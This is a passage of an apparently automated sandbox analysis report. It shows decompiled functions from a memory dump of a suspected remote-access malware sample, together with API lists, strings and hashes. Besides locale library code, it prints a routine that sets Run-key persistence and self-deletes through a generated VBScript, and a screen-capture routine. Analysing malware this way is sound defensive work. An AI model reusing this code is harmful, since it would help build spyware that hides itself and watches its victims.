                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00450B61,00000000,00000000,?), ref: 00450DEF
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale_abort_free
                    • String ID:
                    • API String ID: 2692324296-0
                    • Opcode ID: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                    • Instruction ID: 265ab6a49acb69b6371535c2f9c40041978aee9ae2e746c74d294b287eb083f8
                    • Opcode Fuzzy Hash: 10618e774f34a6619048d0637102a68081d551e0a0db41e4c1e10200fba24050
                    • Instruction Fuzzy Hash: 41F0493AA40117ABDB245A64C8077BB7B68EB00315F148C6AEC05A3241EA38FD0986D4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00446C84 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 80%
                    			E00446C84(void* __eflags) {
				int _t15;
				void* _t28;

				E00433700(0x46ca10, 0xc);
				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
				E00444189( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *0x470738 = E004425DA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
				_t15 = EnumSystemLocalesW(E00446C3E, 1);
				_push(0x20);
				asm("ror eax, cl");
				 *0x470738 = 0 ^  *0x46f00c;
				 *(_t28 - 0x1c) = _t15;
				 *(_t28 - 4) = 0xfffffffe;
				E00446CFC();
				return E00433746();
			}





                    0x00446c8b
                    0x00446c90
                    0x00446c99
                    0x00446c9f
                    0x00446cb0
                    0x00446cbc
                    0x00446ccc
                    0x00446cd3
                    0x00446cdb
                    0x00446ce0
                    0x00446ce3
                    0x00446cea
                    0x00446cf6

                    APIs
                      • Part of subcall function 00444189: EnterCriticalSection.KERNEL32(-0006B43D,?,004418AB,00000000,0046C868,0000000C,00441866,?,?,?,00444427,?,?,00446B4A,00000001,00000364), ref: 00444198
                    • EnumSystemLocalesW.KERNEL32(00446C3E,00000001,0046CA10,0000000C), ref: 00446CBC
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                    • Instruction ID: 8a714871f2e0af15b08c3d487532fbc1d9fceb156b6070508e72b175ec7fb5e6
                    • Opcode Fuzzy Hash: aa06587be2c9cb8b071f33295b8cbec66515d87765e7fc573258893074f482cb
                    • Instruction Fuzzy Hash: F4F04F72610204EFE714EF68E886B5D77E0EB05725F10813BF844DB2E2DB799A808F59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004507D0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004507D0(void* __ecx, void* __edx, signed char* _a4) {
				void* __ebp;
				intOrPtr _t9;
				signed char* _t13;
				void* _t14;
				intOrPtr* _t16;
				void* _t20;
				void* _t22;

				_t20 = E00446A95(_t14, __ecx, __edx);
				_t16 =  *((intOrPtr*)(_t20 + 0x54));
				_t22 = _t16 + 2;
				do {
					_t9 =  *_t16;
					_t16 = _t16 + 2;
				} while (_t9 != 0);
				 *(_t20 + 0x64) = 0 | _t16 - _t22 >> 0x00000001 == 0x00000003;
				EnumSystemLocalesW(0x450727, 1);
				_t13 = _a4;
				if(( *_t13 & 0x00000004) == 0) {
					 *_t13 = 0;
					return _t13;
				}
				return _t13;
			}










                    0x004507dc
                    0x004507e0
                    0x004507e3
                    0x004507e6
                    0x004507e6
                    0x004507e9
                    0x004507ec
                    0x00450804
                    0x00450807
                    0x0045080d
                    0x00450813
                    0x00450815
                    0x00000000
                    0x00450815
                    0x0045081a

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • EnumSystemLocalesW.KERNEL32(00450727,00000001,?,?,?,00450F92,m3D,?,?,?,?,?,0044336D,?,?,?), ref: 00450807
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID:
                    • API String ID: 1084509184-0
                    • Opcode ID: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                    • Instruction ID: 6cc6cd71b12713b10ec057b6d25e2a24f4d08592f735aee3b5647b3ea735c769
                    • Opcode Fuzzy Hash: 9174a0c065a7b49ba50cb90ab7ddfc1d90f3254fc2b27fe64f266881c7e4a03e
                    • Instruction Fuzzy Hash: 6DF05C3930024597CB049F35DC05A6BBF50EFC2755B06805EEE058B641C635AC46CB54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040EE14 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                    Download Yara Rule
                    C-Code - Quality: 75%
                    			E0040EE14(void* __ecx) {
				char _v8;
				void* __ebp;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t15;

				_push(__ecx);
				_t13 = __ecx;
				GetLocaleInfoA(0x800, 0x5a,  &_v8, 3);
				E00402073(_t8, _t13, _t11, _t15,  &_v8);
				return _t13;
			}









                    0x0040ee17
                    0x0040ee1e
                    0x0040ee28
                    0x0040ee34
                    0x0040ee3f

                    APIs
                    • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00414839,00472EC8,00473950,00472EC8,00000000,00472EC8,00000000,00472EC8,4.6.0 Pro), ref: 0040EE28
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID:
                    • API String ID: 2299586839-0
                    • Opcode ID: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                    • Instruction ID: f278ed4507f78d565aa92993a3921e54a570b3fb05803534b7f05061c5bfe0db
                    • Opcode Fuzzy Hash: 89d85122d4b319954b498ca729ef7b6588c5c2e3b4f1b669d3eb966a2cd12403
                    • Instruction Fuzzy Hash: C0D05B30B4421C77E51096859C0AFAB7B9CD701B52F0001A6BA04D72C0D9E15E0087D5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040C929 Relevance: 49.3, APIs: 6, Strings: 22, Instructions: 281registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E0040C929(void* __edx, void* _a4) {
				char _v0;
				short _v524;
				char _v548;
				void* _v560;
				char _v576;
				void* _v584;
				char _v596;
				char _v600;
				char _v612;
				char _v620;
				char _v624;
				char _v628;
				void* _v632;
				char _v644;
				char _v648;
				char _v652;
				void* _v656;
				char _v668;
				char _v672;
				char _v676;
				void* _v680;
				char _v692;
				void* _v696;
				char _v700;
				char _v704;
				char _v708;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t67;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t213;
				void* _t244;
				void* _t246;
				void* _t247;
				void* _t248;

				_t213 = __edx;
				E00411D93();
				if( *0x46f9d4 != 0x30) {
					E0040AE1C();
				}
				_t244 =  *0x470d63 - 1; // 0x0
				if(_t244 == 0) {
					E004185EF(_t213, _t244);
				}
				if( *0x470a85 != 0) {
					E0041AC0A(E00401EE4(0x472d40), _t213);
				}
				_t230 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t246 =  *0x470b33 - 1; // 0x1
				if(_t246 == 0) {
					E00412D0B(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", E00401EE4(0x473208));
				}
				_t247 =  *0x470b30 - 1; // 0x1
				if(_t247 == 0) {
					E00412D0B(0x80000002, _t230, E00401EE4(0x473208));
				}
				_t248 =  *0x470b31 - 1; // 0x0
				if(_t248 == 0) {
					E00412D0B(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", E00401EE4(0x473208));
				}
				_t53 = E0040245C();
				_t54 = E00401F8B(0x473280);
				_t57 = E004129E0(E00401F8B(0x473238), "exepath",  &_v524, 0x208, _t54, _t53);
				_t249 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v524, 0x208);
				}
				RegDeleteKeyA(0x80000001, E00401F8B(0x473238));
				_t61 = SetFileAttributesW( &_v524, 0x80);
				_t140 = 0x473250;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E00406E2B(_t249);
				_t250 = _t62;
				if(_t62 != 0) {
					_t140 = 0x473250;
					SetFileAttributesW(E00401EE4(0x473250), 0x80);
				}
				E00402FF4(_t134,  &_v600, E0040415E(_t134,  &_v668, 0x46a8f0, 0x46a8f0, E0043A99F(_t134, _t140, _t250, L"Temp")), 0, 0x46a8f0, _t250, L"\\update.vbs");
				E00401EE9();
				_t67 = E0040415E(_t134,  &_v672, _t64, 0x46a8f0, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
				_t217 = L"On Error Resume Next\n";
				E004042DC(_t134,  &_v700, L"On Error Resume Next\n", 0x46a8f0, _t250, _t67);
				E00401EE9();
				_t251 = _t134;
				if(_t134 != 0) {
					_t217 = E004042DC(_t134,  &_v648, L"while fso.FileExists(\"", 0x46a8f0, _t251, E0040415E(_t134,  &_v620, L"On Error Resume Next\n", 0x46a8f0,  &_v524));
					E0040323D(E00402FF4(_t134,  &_v672, _t109, 0, 0x46a8f0, _t251, L"\")\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
				}
				_t236 = L"\"\n";
				E0040323D(E00402FF4(_t134,  &_v624, E00402FF4(_t134,  &_v648, E0040415E(_t134,  &_v668, _t217, 0x46a8f0, L"fso.DeleteFile \""), 0, 0x46a8f0, _t251,  &_v524), 0, 0x46a8f0, _t251, L"\"\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				_t252 = _t134;
				if(_t134 != 0) {
					_t26 =  &_v692; // 0x465028
					L004086C6(_t134, _t26, 0, 0x46a8f0, L"wend\n");
				}
				_t220 = 0x46a8f0;
				_t78 = E00406E2B(_t252);
				_t253 = _t78;
				if(_t78 != 0) {
					_t220 = E0040AEF6( &_v644, L"fso.DeleteFolder \"", 0x46a8f0, 0x473250);
					E0040323D(E00402FF4(0x473250,  &_v620, _t101, 0, 0x46a8f0, _t253, _t236));
					E00401EE9();
					E00401EE9();
				}
				_t79 = E0040415E(0x473250,  &_v548, _t220, 0x46a8f0, L"\"\"\", 0");
				E0040323D(E00402FF4(0x473250,  &_v628, E00402F85( &_v652, E004042FD(0x473250,  &_v676, E0040415E(0x473250,  &_v576, _t220, 0x46a8f0, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), 0x46a8f0, _t253,  &_v0), _t79), 0, 0x46a8f0, _t253, "\n"));
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				E00401EE9();
				L004086C6(0x473250,  &_v704, 0, 0x46a8f0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = E00401EE4( &_v612);
				_t93 = E0040245C();
				E00401EE4( &_v708);
				if(E0041AD6A(_t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", E00401EE4( &_v596), 0x46a8f0, 0x46a8f0, 0) > 0x20) {
					ExitProcess(0);
				}
				E00401EE9();
				E00401EE9();
				return E00401EE9();
			}
















































                    0x0040c929
                    0x0040c933
                    0x0040c93f
                    0x0040c941
                    0x0040c941
                    0x0040c949
                    0x0040c94f
                    0x0040c951
                    0x0040c951
                    0x0040c95d
                    0x0040c96b
                    0x0040c96b
                    0x0040c975
                    0x0040c97a
                    0x0040c980
                    0x0040c991
                    0x0040c996
                    0x0040c99c
                    0x0040c9a2
                    0x0040c9b0
                    0x0040c9b5
                    0x0040c9b6
                    0x0040c9bc
                    0x0040c9cd
                    0x0040c9d2
                    0x0040c9da
                    0x0040c9e2
                    0x0040ca09
                    0x0040ca13
                    0x0040ca15
                    0x0040ca21
                    0x0040ca21
                    0x0040ca34
                    0x0040ca4d
                    0x0040ca5a
                    0x0040ca5f
                    0x0040ca61
                    0x0040ca64
                    0x0040ca69
                    0x0040ca6b
                    0x0040ca72
                    0x0040ca7d
                    0x0040ca7d
                    0x0040ca9f
                    0x0040caa9
                    0x0040cab7
                    0x0040cabd
                    0x0040cac6
                    0x0040cad0
                    0x0040cad5
                    0x0040cad7
                    0x0040caff
                    0x0040cb10
                    0x0040cb19
                    0x0040cb22
                    0x0040cb2b
                    0x0040cb2b
                    0x0040cb30
                    0x0040cb69
                    0x0040cb72
                    0x0040cb7b
                    0x0040cb84
                    0x0040cb89
                    0x0040cb8b
                    0x0040cb92
                    0x0040cb96
                    0x0040cb96
                    0x0040cba0
                    0x0040cba4
                    0x0040cba9
                    0x0040cbab
                    0x0040cbbe
                    0x0040cbcf
                    0x0040cbd8
                    0x0040cbe1
                    0x0040cbe1
                    0x0040cbf7
                    0x0040cc3f
                    0x0040cc48
                    0x0040cc51
                    0x0040cc5a
                    0x0040cc66
                    0x0040cc72
                    0x0040cc80
                    0x0040cc8a
                    0x0040cc94
                    0x0040cca1
                    0x0040ccb3
                    0x0040ccd4
                    0x0040ccd4
                    0x0040ccde
                    0x0040cce7
                    0x0040cd02

                    APIs
                      • Part of subcall function 00411D93: TerminateProcess.KERNEL32(00000000,pth_unenc,0040EE0B), ref: 00411DA3
                      • Part of subcall function 00411D93: WaitForSingleObject.KERNEL32(000000FF), ref: 00411DB6
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040CA21
                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040CA34
                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040CA4D
                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040CA7D
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(00409880,00000000,pth_unenc,0040C5C1,00473220,00473238,?,pth_unenc), ref: 0040AE2B
                      • Part of subcall function 0040AE1C: UnhookWindowsHookEx.USER32(?), ref: 0040AE3B
                      • Part of subcall function 0040AE1C: TerminateThread.KERNEL32(0040986A,00000000,?,pth_unenc), ref: 0040AE4D
                      • Part of subcall function 0041AD6A: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041AE89,00000000,00000000,?), ref: 0041ADA9
                    • ShellExecuteW.SHELL32(00000000,open,00000000,0046A8F0,0046A8F0,00000000), ref: 0040CCC8
                    • ExitProcess.KERNEL32 ref: 0040CCD4
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                    • String ID: """, 0$")$(PF$82G$@-G$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$P2G$P2G$P2G$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                    • API String ID: 1861856835-3214438867
                    • Opcode ID: 24672556332e620990219bda3f023fd5161334b1afc816b9838d8eee8101912b
                    • Instruction ID: f36577c89e8dd83dec34a85844eba9d7716d9325f3a0deb710764ed536580f15
                    • Opcode Fuzzy Hash: 24672556332e620990219bda3f023fd5161334b1afc816b9838d8eee8101912b
                    • Instruction Fuzzy Hash: 059182712042405BC718FB62D892AEF77E99F90308F10453FF546A71E2EE789D49C69E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00417A23 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 307windowmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E00417A23(void* __ecx, int __edx, void* __eflags) {
				signed int _v16;
				struct _ICONINFO _v132;
				signed int _v146;
				signed int _v148;
				char _v149;
				char _v152;
				signed int _v156;
				signed int _v160;
				void* _v164;
				struct HICON__* _v168;
				char _v172;
				int _v176;
				int _v180;
				int _v188;
				int _v196;
				intOrPtr _v224;
				void* _v228;
				char _v233;
				char _v236;
				struct HDC__* _v240;
				intOrPtr _v242;
				void* _v244;
				intOrPtr _v246;
				char _v248;
				intOrPtr _v250;
				signed int _v252;
				char _v256;
				char _v260;
				struct HDC__* _v268;
				void* _v284;
				void* _v296;
				struct HDC__* _v308;
				void* __ebx;
				void* __ebp;
				int _t104;
				void* _t111;
				void* _t113;
				int _t118;
				void* _t119;
				signed int _t122;
				signed char _t131;
				long _t137;
				void* _t138;
				void* _t177;
				void* _t179;
				void* _t185;
				void* _t195;
				signed int _t214;
				int _t218;
				void* _t219;
				struct HDC__* _t223;
				struct tagBITMAPINFO* _t225;
				void* _t226;
				int _t232;
				struct HDC__* _t234;

				_t215 = __edx;
				_v149 = __edx;
				_t185 = __ecx;
				_t223 = CreateDCA("DISPLAY", 0, 0, 0);
				_v160 = _t223;
				_t234 = CreateCompatibleDC(_t223);
				_t104 = E00417E84(_v16);
				_v176 = _t104;
				_t218 = _t215;
				_v168 = _t218;
				if(_t104 == 0 || _t218 == 0) {
					_t104 = E00417EC6( *((intOrPtr*)((_v16 << 4) + 0x4726b0)));
					_t218 = _t215;
					_v176 = _t104;
					_v168 = _t218;
				}
				if(_t104 == 0 || _t218 == 0) {
					L8:
					E00402073(_t185, _t185, _t215, _t234, 0x464074);
					goto L9;
				} else {
					_t215 =  &_v160;
					_v160 = _v160 & 0x00000000;
					_v156 = _v156 & 0x00000000;
					E00417EFC( *((intOrPtr*)((_v16 << 4) + 0x4726b0)),  &_v160);
					_t219 = CreateCompatibleBitmap(_t223, _v176, _t218);
					_v164 = _t219;
					if(_t219 != 0) {
						_t111 = SelectObject(_t234, _t219);
						__eflags = _t111;
						if(_t111 != 0) {
							_t113 = StretchBlt(_t234, 0, 0, _v196, _v188, _t223, _v180, _v176, _v196, _v188, 0xcc0020);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L11;
							}
							__eflags = _v233;
							if(_v233 != 0) {
								_v172 = 0x14;
								_t177 =  *0x4736e4( &_v172);
								__eflags = _t177;
								if(_t177 != 0) {
									_t179 = GetIconInfo(_v168,  &_v132);
									__eflags = _t179;
									if(_t179 != 0) {
										_t232 = _v160 - _v132.yHotspot - _v224;
										__eflags = _t232;
										DeleteObject(_v132.hbmColor);
										DeleteObject(_v132.yHotspot);
										DrawIcon(_t234, _v164 - _v132.xHotspot - _v228, _t232, _v176);
										_t219 = _v228;
										_t223 = _v240;
									}
								}
							}
							_push( &_v152);
							_t118 = 0x18;
							_t119 = GetObjectA(_t219, _t118, ??);
							__eflags = _t119;
							if(_t119 == 0) {
								goto L11;
							} else {
								_t122 = _v146 * _v148 & 0x0000ffff;
								__eflags = _t122 - 1;
								if(_t122 != 1) {
									_push(4);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										L28:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L29:
										_t225 = LocalAlloc(0x40, ??);
										_t195 = 0x18;
										_t225->bmiHeader = 0x28;
										_t225->bmiHeader.biWidth = _v160;
										_t225->bmiHeader.biHeight = _v156;
										_t225->bmiHeader.biPlanes = _v148;
										_t225->bmiHeader.biBitCount = _v146;
										_t131 = _v252;
										__eflags = _t131 - _t195;
										if(_t131 < _t195) {
											__eflags = 1;
											_t225->bmiHeader.biClrUsed = 1 << _t131;
										}
										_t225->bmiHeader.biCompression = _t225->bmiHeader.biCompression & 0x00000000;
										_t225->bmiHeader.biClrImportant = _t225->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t215 = 1;
										_t137 = (_t225->bmiHeader.biWidth + 8 >> 3) * (_v252 & 0x0000ffff) * _t225->bmiHeader.biHeight;
										_t225->bmiHeader.biSizeImage = _t137;
										_t138 = GlobalAlloc(0, _t137);
										_v244 = _t138;
										__eflags = _t138;
										if(_t138 != 0) {
											__eflags = GetDIBits(_t234, _t219, 0, _t225->bmiHeader.biHeight & 0x0000ffff, _t138, _t225, 0);
											if(__eflags != 0) {
												_v252 = 0x4d42;
												_v250 = _t225->bmiHeader.biSizeImage + _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												_v246 = 0;
												_v242 = _t225->bmiHeader + _t225->bmiHeader.biClrUsed * 4 + 0xe;
												E004020BF(_t185,  &_v236);
												E004020BF(_t185,  &_v148);
												E004024EA(_t185,  &_v236, 1, __eflags,  &_v252, 0xe);
												L00403356( &_v244);
												E004024EA(_t185,  &_v248, 1, __eflags, _t225, 0x28);
												L00403356( &_v256);
												_t226 = _v296;
												E004024EA(_t185,  &_v260, 1, __eflags, _t226, _t225->bmiHeader.biSizeImage);
												L00403356( &_v268);
												DeleteObject(_t219);
												GlobalFree(_t226);
												DeleteDC(_v308);
												__eflags = _t234 -  *0x4726ac;
												if(__eflags != 0) {
													DeleteDC(_t234);
												}
												E00402035(_t185, _t185, _t234, __eflags,  &_v156);
												E00401FB8();
												E00401FB8();
												L9:
												return _t185;
											}
											DeleteDC(_v268);
											DeleteDC(_t234);
											DeleteObject(_t219);
											GlobalFree(_v284);
										} else {
											DeleteDC(_v240);
											L12:
											DeleteDC(_t234);
											DeleteObject(_t219);
											L7:
										}
										goto L8;
									}
									_push(8);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										goto L28;
									}
									_push(0x10);
									_pop(1);
									_v252 = 1;
									__eflags = _t122 - 1;
									if(_t122 <= 1) {
										goto L28;
									}
									_t214 = 0x18;
									__eflags = _t122 - _t214;
									if(_t122 > _t214) {
										_push(0x20);
										_pop(1);
										L27:
										_v252 = 1;
										goto L28;
									}
									_v252 = _t214;
									_push(0x28);
									goto L29;
								}
								goto L27;
							}
						}
						L11:
						DeleteDC(_t223);
						goto L12;
					}
					DeleteDC(_t223);
					DeleteDC(_t234);
					DeleteObject(_t219);
					goto L7;
				}
			}


























































                    0x00417a23
                    0x00417a2f
                    0x00417a3b
                    0x00417a43
                    0x00417a46
                    0x00417a57
                    0x00417a59
                    0x00417a5e
                    0x00417a62
                    0x00417a64
                    0x00417a6a
                    0x00417a80
                    0x00417a85
                    0x00417a87
                    0x00417a8b
                    0x00417a8b
                    0x00417a91
                    0x00417ae3
                    0x00417aea
                    0x00000000
                    0x00417a97
                    0x00417a9e
                    0x00417aa2
                    0x00417aa7
                    0x00417ab5
                    0x00417ac6
                    0x00417ac8
                    0x00417ace
                    0x00417afe
                    0x00417b04
                    0x00417b06
                    0x00417b36
                    0x00417b3c
                    0x00417b3e
                    0x00000000
                    0x00000000
                    0x00417b40
                    0x00417b45
                    0x00417b4b
                    0x00417b54
                    0x00417b5a
                    0x00417b5c
                    0x00417b6a
                    0x00417b70
                    0x00417b72
                    0x00417b95
                    0x00417b95
                    0x00417b99
                    0x00417ba6
                    0x00417bb3
                    0x00417bb9
                    0x00417bbd
                    0x00417bbd
                    0x00417b72
                    0x00417b5c
                    0x00417bc5
                    0x00417bc8
                    0x00417bcb
                    0x00417bd1
                    0x00417bd3
                    0x00000000
                    0x00417bd9
                    0x00417be5
                    0x00417be8
                    0x00417beb
                    0x00417bf1
                    0x00417bf3
                    0x00417bf4
                    0x00417bf8
                    0x00417bfb
                    0x00417c2c
                    0x00417c2e
                    0x00417c37
                    0x00417c38
                    0x00417c40
                    0x00417c44
                    0x00417c45
                    0x00417c4f
                    0x00417c56
                    0x00417c5e
                    0x00417c67
                    0x00417c6b
                    0x00417c6f
                    0x00417c72
                    0x00417c79
                    0x00417c7b
                    0x00417c7b
                    0x00417c88
                    0x00417c8c
                    0x00417c90
                    0x00417c91
                    0x00417c9f
                    0x00417ca6
                    0x00417ca9
                    0x00417caf
                    0x00417cb3
                    0x00417cb5
                    0x00417cd3
                    0x00417cd5
                    0x00417d02
                    0x00417d17
                    0x00417d1d
                    0x00417d30
                    0x00417d34
                    0x00417d40
                    0x00417d50
                    0x00417d61
                    0x00417d6d
                    0x00417d7e
                    0x00417d86
                    0x00417d8f
                    0x00417da0
                    0x00417da6
                    0x00417dad
                    0x00417dbd
                    0x00417dbf
                    0x00417dc5
                    0x00417dc8
                    0x00417dc8
                    0x00417dd4
                    0x00417de0
                    0x00417de9
                    0x00417af2
                    0x00417afb
                    0x00417afb
                    0x00417ce1
                    0x00417ce4
                    0x00417ce7
                    0x00417cf2
                    0x00417cb7
                    0x00417b0f
                    0x00417b09
                    0x00417b12
                    0x00417add
                    0x00417add
                    0x00417add
                    0x00000000
                    0x00417cb5
                    0x00417bfd
                    0x00417bff
                    0x00417c00
                    0x00417c04
                    0x00417c07
                    0x00000000
                    0x00000000
                    0x00417c09
                    0x00417c0b
                    0x00417c0c
                    0x00417c10
                    0x00417c13
                    0x00000000
                    0x00000000
                    0x00417c17
                    0x00417c18
                    0x00417c1b
                    0x00417c25
                    0x00417c27
                    0x00417c28
                    0x00417c28
                    0x00000000
                    0x00417c28
                    0x00417c1d
                    0x00417c21
                    0x00000000
                    0x00417c21
                    0x00000000
                    0x00417bed
                    0x00417bd3
                    0x00417b08
                    0x00417b0f
                    0x00000000
                    0x00417b0f
                    0x00417ad7
                    0x00417ada
                    0x00417add
                    0x00000000
                    0x00417add

                    APIs
                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417A3D
                    • CreateCompatibleDC.GDI32(00000000), ref: 00417A4A
                      • Part of subcall function 00417E84: EnumDisplaySettingsW.USER32 ref: 00417EB4
                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00417AC0
                    • DeleteDC.GDI32(00000000), ref: 00417AD7
                    • DeleteDC.GDI32(00000000), ref: 00417ADA
                    • DeleteObject.GDI32(00000000), ref: 00417ADD
                    • SelectObject.GDI32(00000000,00000000), ref: 00417AFE
                    • DeleteDC.GDI32(00000000), ref: 00417B0F
                    • DeleteDC.GDI32(00000000), ref: 00417B12
                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00417B36
                    • GetIconInfo.USER32(?,?), ref: 00417B6A
                    • DeleteObject.GDI32(?), ref: 00417B99
                    • DeleteObject.GDI32(?), ref: 00417BA6
                    • DrawIcon.USER32 ref: 00417BB3
                    • GetObjectA.GDI32(00000000,00000018,?), ref: 00417BCB
                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417C3A
                    • GlobalAlloc.KERNEL32(00000000,?), ref: 00417CA9
                    • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417CCD
                    • DeleteDC.GDI32(?), ref: 00417CE1
                    • DeleteDC.GDI32(00000000), ref: 00417CE4
                    • DeleteObject.GDI32(00000000), ref: 00417CE7
                    • GlobalFree.KERNEL32 ref: 00417CF2
                    • DeleteObject.GDI32(00000000), ref: 00417DA6
                    • GlobalFree.KERNEL32 ref: 00417DAD
                    • DeleteDC.GDI32(?), ref: 00417DBD
                    • DeleteDC.GDI32(00000000), ref: 00417DC8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
